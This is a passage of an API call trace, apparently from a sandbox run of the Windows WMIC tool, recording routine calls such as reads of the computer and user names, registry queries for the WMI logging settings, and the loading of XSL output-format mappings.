(Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=741966570, Attributes=0xf12a), (Luid.LowPart=0x0, Luid.HighPart=3506032, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0257.052] free (_Block=0x356980) [0257.052] CloseHandle (hObject=0xf4) returned 1 [0257.052] malloc (_Size=0x40) returned 0x357f70 [0257.053] malloc (_Size=0x40) returned 0x356980 [0257.053] malloc (_Size=0x40) returned 0x3569d0 [0257.053] malloc (_Size=0x20a) returned 0x356a20 [0257.053] GetSystemDirectoryW (in: lpBuffer=0x356a20, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0257.053] free (_Block=0x356a20) [0257.053] malloc (_Size=0x18) returned 0x356a20 [0257.053] malloc (_Size=0x18) returned 0x356a40 [0257.053] malloc (_Size=0x18) returned 0x356a60 [0257.053] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0257.053] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0257.053] free (_Block=0x356a20) [0257.053] free (_Block=0x356a40) [0257.053] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0257.054] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0257.054] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0257.054] FreeLibrary (hLibModule=0x77940000) returned 1 [0257.054] free (_Block=0x356a60) [0257.054] _vsnwprintf (in: _Buffer=0x3569d0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xef2e8 | out: _Buffer="ms_409") returned 6 [0257.054] malloc (_Size=0x20) returned 0x356a20 [0257.054] GetComputerNameW (in: lpBuffer=0x356a20, nSize=0xef6c0 | out: lpBuffer="XDUWTFONO", nSize=0xef6c0) returned 1 [0257.055] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.055] malloc (_Size=0x14) returned 0x356a50 [0257.055] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.055] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xef6b8 | out: lpNameBuffer=0x0, nSize=0xef6b8) returned 0x7fffffde000 [0257.056] GetLastError () returned 0xea [0257.056] malloc (_Size=0x40) returned 0x356a70 [0257.056] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x356a70, nSize=0xef6b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xef6b8) returned 0x1 [0257.057] lstrlenW (lpString="") returned 0 [0257.057] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.057] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0257.059] lstrlenW (lpString=".") returned 1 [0257.059] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.059] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0257.059] lstrlenW (lpString="LOCALHOST") returned 9 [0257.059] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.059] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0257.059] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.060] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.060] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0257.060] free (_Block=0x356a50) [0257.060] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.060] malloc (_Size=0x14) returned 0x356a50 [0257.060] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.060] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.060] malloc (_Size=0x14) returned 0x356ac0 [0257.060] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.060] malloc (_Size=0x8) returned 0x356ae0 [0257.060] malloc (_Size=0x18) returned 0x356b00 [0257.060] malloc (_Size=0x30) returned 0x356b20 [0257.060] malloc (_Size=0x18) returned 0x356b60 [0257.060] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.060] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.060] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.060] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.060] malloc (_Size=0x30) returned 0x356b80 [0257.060] malloc (_Size=0x18) returned 0x356bc0 [0257.061] SysStringLen (param_1="IMPERSONATE") returned 0xb [0257.061] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.061] SysStringLen (param_1="IMPERSONATE") returned 0xb [0257.061] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.061] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.061] SysStringLen (param_1="IMPERSONATE") returned 0xb [0257.061] malloc (_Size=0x30) returned 0x356be0 [0257.061] malloc (_Size=0x18) returned 0x356c20 [0257.061] SysStringLen (param_1="DELEGATE") returned 0x8 [0257.061] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.061] SysStringLen (param_1="DELEGATE") returned 0x8 [0257.061] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.061] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.061] SysStringLen (param_1="DELEGATE") returned 0x8 [0257.061] malloc (_Size=0x30) returned 0x356c40 [0257.061] malloc (_Size=0x18) returned 0x356c80 [0257.061] malloc (_Size=0x30) returned 0x356ca0 [0257.061] malloc (_Size=0x18) returned 0x356ce0 [0257.061] SysStringLen (param_1="NONE") returned 0x4 [0257.061] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.061] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.061] SysStringLen (param_1="NONE") returned 0x4 [0257.062] malloc (_Size=0x30) returned 0x356d00 [0257.062] malloc (_Size=0x18) returned 0x356d40 [0257.062] SysStringLen (param_1="CONNECT") returned 0x7 [0257.062] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.062] malloc (_Size=0x30) returned 0x356d60 [0257.062] malloc (_Size=0x18) returned 0x356da0 [0257.062] SysStringLen (param_1="CALL") returned 0x4 [0257.062] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.062] SysStringLen (param_1="CALL") returned 0x4 [0257.062] SysStringLen (param_1="CONNECT") returned 0x7 [0257.062] malloc (_Size=0x30) returned 0x356dc0 [0257.062] malloc (_Size=0x18) returned 0x356e00 [0257.062] SysStringLen (param_1="PKT") returned 0x3 [0257.062] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.062] SysStringLen (param_1="PKT") returned 0x3 [0257.062] SysStringLen (param_1="NONE") returned 0x4 [0257.062] SysStringLen (param_1="NONE") returned 0x4 [0257.062] SysStringLen (param_1="PKT") returned 0x3 [0257.062] malloc (_Size=0x30) returned 0x356e20 [0257.062] malloc (_Size=0x18) returned 0x356e60 [0257.062] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.062] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.062] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.062] SysStringLen (param_1="NONE") returned 0x4 [0257.063] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.063] SysStringLen (param_1="PKT") returned 0x3 [0257.063] SysStringLen (param_1="PKT") returned 0x3 [0257.063] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.063] malloc (_Size=0x30) returned 0x358000 [0257.063] malloc (_Size=0x18) returned 0x356e80 [0257.063] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.063] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.064] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.064] SysStringLen (param_1="PKT") returned 0x3 [0257.064] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.064] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.064] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.064] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.064] malloc (_Size=0x30) returned 0x358040 [0257.064] malloc (_Size=0x40) returned 0x356ea0 [0257.064] malloc (_Size=0x20a) returned 0x356ef0 [0257.064] GetSystemDirectoryW (in: lpBuffer=0x356ef0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0257.064] free (_Block=0x356ef0) [0257.064] malloc (_Size=0x18) returned 0x356ef0 [0257.064] malloc (_Size=0x18) returned 0x356f10 [0257.064] malloc (_Size=0x18) returned 0x356f30 [0257.064] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0257.064] SysStringLen (param_1="\\wbem\\") returned 0x6 [0257.064] free (_Block=0x356ef0) [0257.064] free (_Block=0x356f10) [0257.065] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0257.065] free (_Block=0x356f30) [0257.065] malloc (_Size=0x18) returned 0x356ef0 [0257.065] malloc (_Size=0x18) returned 0x356f10 [0257.065] malloc (_Size=0x18) returned 0x356f30 [0257.065] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0257.065] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0257.065] free (_Block=0x356ef0) [0257.065] free (_Block=0x356f10) [0257.065] GetCurrentThreadId () returned 0x730 [0257.065] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xeefc0 | out: phkResult=0xeefc0*=0xf8) returned 0x0 [0257.065] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xef010, lpcbData=0xeefb0*=0x400 | out: lpType=0x0, lpData=0xef010*=0x30, lpcbData=0xeefb0*=0x4) returned 0x0 [0257.065] _wcsicmp (_String1="0", _String2="1") returned -1 [0257.066] _wcsicmp (_String1="0", _String2="2") returned -2 [0257.066] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xeefb0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xeefb0*=0x42) returned 0x0 [0257.066] malloc (_Size=0x86) returned 0x356f50 [0257.066] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x356f50, lpcbData=0xeefb0*=0x42 | out: lpType=0x0, lpData=0x356f50*=0x25, lpcbData=0xeefb0*=0x42) returned 0x0 [0257.066] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0257.066] malloc (_Size=0x42) returned 0x356fe0 [0257.066] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0257.066] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xef010, lpcbData=0xeefb0*=0x400 | out: lpType=0x0, lpData=0xef010*=0x36, lpcbData=0xeefb0*=0xc) returned 0x0 [0257.066] _wtol (_String="65536") returned 65536 [0257.066] free (_Block=0x356f50) [0257.066] RegCloseKey (hKey=0x0) returned 0x6 [0257.066] CoCreateInstance (in: rclsid=0xffc07410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc073f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xef4b8 | out: ppv=0xef4b8*=0x21e71d0) returned 0x0 [0257.090] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21e71d0, xmlSource=0xef600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x356ef0), isSuccessful=0xef670 | out: isSuccessful=0xef670*=0xffff) returned 0x0 [0257.248] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21e71d0, DOMElement=0xef4b0 | out: DOMElement=0xef4b0*=0x21ebc50) returned 0x0 [0257.249] malloc (_Size=0x18) returned 0x35c560 [0257.249] IXMLDOMElement:getElementsByTagName (in: This=0x21ebc50, tagName="XSLFORMAT", resultList=0xef4c0 | out: resultList=0xef4c0*=0x21e9cc0) returned 0x0 [0257.250] free (_Block=0x35c560) [0257.250] IXMLDOMNodeList:get_length (in: This=0x21e9cc0, listLength=0xef688 | out: listLength=0xef688*=21) returned 0x0 [0257.250] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=0, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.251] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="texttable.xsl") returned 0x0 [0257.251] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.251] malloc (_Size=0x18) returned 0x35c560 [0257.251] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.251] free (_Block=0x35c560) [0257.252] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0257.252] malloc (_Size=0x18) returned 0x35c560 [0257.252] malloc (_Size=0x18) returned 0x35c580 [0257.252] malloc (_Size=0x30) returned 0x358080 [0257.252] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.252] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.252] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.252] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=1, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.252] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="textvaluelist.xsl") returned 0x0 [0257.252] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.253] malloc (_Size=0x18) returned 0x35c5a0 [0257.253] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.253] free (_Block=0x35c5a0) [0257.253] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0257.253] malloc (_Size=0x18) returned 0x35c5a0 [0257.253] malloc (_Size=0x18) returned 0x35c5c0 [0257.253] SysStringLen (param_1="VALUE") returned 0x5 [0257.253] SysStringLen (param_1="TABLE") returned 0x5 [0257.253] SysStringLen (param_1="TABLE") returned 0x5 [0257.253] SysStringLen (param_1="VALUE") returned 0x5 [0257.253] malloc (_Size=0x30) returned 0x3580c0 [0257.254] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.254] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.254] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.254] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=2, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.254] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="textvaluelist.xsl") returned 0x0 [0257.254] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.254] malloc (_Size=0x18) returned 0x35c5e0 [0257.254] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.254] free (_Block=0x35c5e0) [0257.254] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0257.254] malloc (_Size=0x18) returned 0x35c5e0 [0257.255] malloc (_Size=0x18) returned 0x35c600 [0257.255] SysStringLen (param_1="LIST") returned 0x4 [0257.255] SysStringLen (param_1="TABLE") returned 0x5 [0257.255] malloc (_Size=0x30) returned 0x358100 [0257.255] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.255] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.255] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.255] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=3, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.255] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="rawxml.xsl") returned 0x0 [0257.255] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.255] malloc (_Size=0x18) returned 0x35c620 [0257.255] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.255] free (_Block=0x35c620) [0257.255] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0257.256] malloc (_Size=0x18) returned 0x35c620 [0257.256] malloc (_Size=0x18) returned 0x35c640 [0257.256] SysStringLen (param_1="RAWXML") returned 0x6 [0257.256] SysStringLen (param_1="TABLE") returned 0x5 [0257.256] SysStringLen (param_1="RAWXML") returned 0x6 [0257.256] SysStringLen (param_1="LIST") returned 0x4 [0257.256] SysStringLen (param_1="LIST") returned 0x4 [0257.256] SysStringLen (param_1="RAWXML") returned 0x6 [0257.256] malloc (_Size=0x30) returned 0x358140 [0257.256] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.256] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.256] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.256] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=4, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.256] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="htable.xsl") returned 0x0 [0257.256] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.256] malloc (_Size=0x18) returned 0x35c660 [0257.256] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.256] free (_Block=0x35c660) [0257.257] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0257.257] malloc (_Size=0x18) returned 0x35c660 [0257.257] malloc (_Size=0x18) returned 0x35c680 [0257.257] SysStringLen (param_1="HTABLE") returned 0x6 [0257.257] SysStringLen (param_1="TABLE") returned 0x5 [0257.257] SysStringLen (param_1="HTABLE") returned 0x6 [0257.257] SysStringLen (param_1="LIST") returned 0x4 [0257.257] malloc (_Size=0x30) returned 0x358180 [0257.257] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.257] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.257] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.257] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=5, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.257] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="hform.xsl") returned 0x0 [0257.257] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.257] malloc (_Size=0x18) returned 0x35c6a0 [0257.257] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.257] free (_Block=0x35c6a0) [0257.257] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0257.257] malloc (_Size=0x18) returned 0x35c6a0 [0257.257] malloc (_Size=0x18) returned 0x35c6c0 [0257.257] SysStringLen (param_1="HFORM") returned 0x5 [0257.257] SysStringLen (param_1="TABLE") returned 0x5 [0257.257] SysStringLen (param_1="HFORM") returned 0x5 [0257.257] SysStringLen (param_1="LIST") returned 0x4 [0257.257] SysStringLen (param_1="HFORM") returned 0x5 [0257.258] SysStringLen (param_1="HTABLE") returned 0x6 [0257.258] malloc (_Size=0x30) returned 0x3581c0 [0257.258] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.258] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.258] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.258] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=6, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.258] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="xml.xsl") returned 0x0 [0257.258] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.258] malloc (_Size=0x18) returned 0x35c6e0 [0257.258] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.258] free (_Block=0x35c6e0) [0257.258] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0257.258] malloc (_Size=0x18) returned 0x35c6e0 [0257.258] malloc (_Size=0x18) returned 0x35c700 [0257.258] SysStringLen (param_1="XML") returned 0x3 [0257.258] SysStringLen (param_1="TABLE") returned 0x5 [0257.258] SysStringLen (param_1="XML") returned 0x3 [0257.258] SysStringLen (param_1="VALUE") returned 0x5 [0257.258] SysStringLen (param_1="VALUE") returned 0x5 [0257.258] SysStringLen (param_1="XML") returned 0x3 [0257.258] malloc (_Size=0x30) returned 0x358200 [0257.259] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.259] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.259] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.259] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=7, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.259] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="mof.xsl") returned 0x0 [0257.259] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.259] malloc (_Size=0x18) returned 0x35c720 [0257.259] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.259] free (_Block=0x35c720) [0257.259] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0257.259] malloc (_Size=0x18) returned 0x35c720 [0257.259] malloc (_Size=0x18) returned 0x35c740 [0257.259] SysStringLen (param_1="MOF") returned 0x3 [0257.259] SysStringLen (param_1="TABLE") returned 0x5 [0257.259] SysStringLen (param_1="MOF") returned 0x3 [0257.259] SysStringLen (param_1="LIST") returned 0x4 [0257.259] SysStringLen (param_1="MOF") returned 0x3 [0257.259] SysStringLen (param_1="RAWXML") returned 0x6 [0257.259] SysStringLen (param_1="LIST") returned 0x4 [0257.260] SysStringLen (param_1="MOF") returned 0x3 [0257.260] malloc (_Size=0x30) returned 0x358240 [0257.260] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.260] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.260] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.260] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=8, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.260] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="csv.xsl") returned 0x0 [0257.260] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.260] malloc (_Size=0x18) returned 0x35c760 [0257.260] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.260] free (_Block=0x35c760) [0257.260] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0257.260] malloc (_Size=0x18) returned 0x35c760 [0257.260] malloc (_Size=0x18) returned 0x35c780 [0257.260] SysStringLen (param_1="CSV") returned 0x3 [0257.260] SysStringLen (param_1="TABLE") returned 0x5 [0257.260] SysStringLen (param_1="CSV") returned 0x3 [0257.261] SysStringLen (param_1="LIST") returned 0x4 [0257.261] SysStringLen (param_1="CSV") returned 0x3 [0257.261] SysStringLen (param_1="HTABLE") returned 0x6 [0257.261] SysStringLen (param_1="CSV") returned 0x3 [0257.261] SysStringLen (param_1="HFORM") returned 0x5 [0257.261] malloc (_Size=0x30) returned 0x358280 [0257.261] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.261] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.261] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.261] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=9, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.261] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="texttable.xsl") returned 0x0 [0257.262] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.262] malloc (_Size=0x18) returned 0x35c7a0 [0257.262] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.262] free (_Block=0x35c7a0) [0257.262] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0257.262] malloc (_Size=0x18) returned 0x35c7a0 [0257.262] malloc (_Size=0x18) returned 0x35c7c0 [0257.262] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.262] SysStringLen (param_1="TABLE") returned 0x5 [0257.262] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.262] SysStringLen (param_1="VALUE") returned 0x5 [0257.262] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.262] SysStringLen (param_1="XML") returned 0x3 [0257.262] SysStringLen (param_1="XML") returned 0x3 [0257.262] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.262] malloc (_Size=0x30) returned 0x3582c0 [0257.263] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.263] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.263] 